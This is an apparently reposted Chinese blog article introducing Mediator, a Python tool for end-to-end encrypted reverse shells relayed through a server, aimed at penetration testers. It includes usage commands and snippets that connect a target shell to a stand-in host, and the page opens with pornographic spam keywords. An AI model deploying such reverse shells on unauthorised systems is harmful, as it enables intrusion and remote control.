日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

一款功能强大,可扩展端到端加密反向Shell的工具

發布時間:2025/3/21 编程问答 20 豆豆
生活随笔 收集整理的這篇文章主要介紹了 一款功能强大,可扩展端到端加密反向Shell的工具 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

關于Mediator

Mediator是一款功能強大的可擴展端到端加密反向Shell,該工具基于新型架構實現,采用Python語言開發,能夠幫助廣大研究人員通過一臺“Mediator”服務器來跟Shell建立連接。這樣一來,研究人員就不需要處理程序設置端口轉發以偵聽連接。除此之外,Mediator還可以幫助我們創建插件來擴展反向Shell的功能。

值得一提的是,我們不僅可以將Mediator的腳本作為獨立的可執行文件運行,也可以將它們導入到其他滲透測試或事件響應工具中進行集成。

工具體系架構

Mediator受到了端到端加密聊天應用程序的啟發,因此Mediator使用了一種獨特的方法來實現反向Shell的客戶端/服務器模型。Mediator使用了如下所示的方法:

客戶端反向Shell

客戶端Handler/Operator

一臺服務器作為連接兩端的橋梁

反向Shell和Handler會使用一個連接密鑰來跟Mediator服務器進行連接。服務器會監聽80端口(Handler連接)和443端口(反向Shell連接)。當客戶端連接至Mediator服務器時,服務器將橋接這兩個連接。此時,兩個客戶端之間將進行密鑰交換,反向Shell和Operator之間的所有通信流量都將采用端到端加密,這樣就可以確保不會有其他第三方窺探Mediator正在傳輸的流量數據。

插件機制

Mediator的插件機制將允許我們添加額外的命令,這些命令能夠在研究人員的主機以及目標主機上執行各種代碼。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/lawndoc/mediator.git

工具配置&使用

服務器端

客戶端腳本可以在Windows或Linux系統上運行,但你首先需要在Linux主機上配置并開啟服務器(mediator.py)。服務器基于純Python開發,因此在使用前無需安裝額外的依賴組件。接下來,我們就可以使用下列命令來啟動服務器了:

$ python3 mediator.py

或者,我們也可以使用提供的Dockerfile來在容器中運行Mediator服務器(確保開啟了80端口和443端口)。

客戶端

如需使用客戶端腳本,則需要安裝requirements.txt中定義的所有依賴組件,我們可以使用下列命令實現:

$ pip3 install -r requirements.txt

→點擊可獲取網絡安全資料·攻略←

  • 2000多本網絡安全系列電子書
  • 網絡安全標準題庫資料
  • 項目源碼
  • 網絡安全基礎入門、Linux、web安全、攻防方面的視頻
  • 網絡安全學習路線圖

    • Mediator服務器地址

    在使用Python腳本時,我們首先需要實例化中介主機的地址:

    Handler類

    from handler import Handler operator = Handler(mediatorHost="example.com") operator.run()

    WindowsRShell類

    from windowsTarget import WindowsRShell shell = WindowsRShell(mediatorHost="example.com") shell.run() 如果直接通過Shell執行客戶端腳本,則則可以對腳本

    底部的地址進行硬編碼,或者通過-s或–server參數來指定服務器地址:
    handler.py

    $ python3 handler.py -s example.com

    windowsTarget.py

    > python windowsTarget.py -s example.com

    連接密鑰

    服務器只接受前綴為“#!ConnectionKey”的密鑰,默認的連接密鑰為“#!ConnectionKey_CHANGE_ME!!!”。

    如需修改Python腳本所使用的連接密鑰,可以選擇在實例化時提供連接密鑰:

    Handler類

    from handler import Handler operator = Handler(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key") operator.run()

    LinuxRShell類

    from linuxTarget import LinuxRShell shell = LinuxRShell(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key") shell.run()

    或者, 在Shell中運行客戶端腳本時,通過-c或–connection-key參數來指定連接密鑰。

    《新程序員》:云原生和全面數字化實踐50位技術專家共同創作,文字、視頻、音頻交互閱讀

    總結

    以上是生活随笔為你收集整理的一款功能强大,可扩展端到端加密反向Shell的工具的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。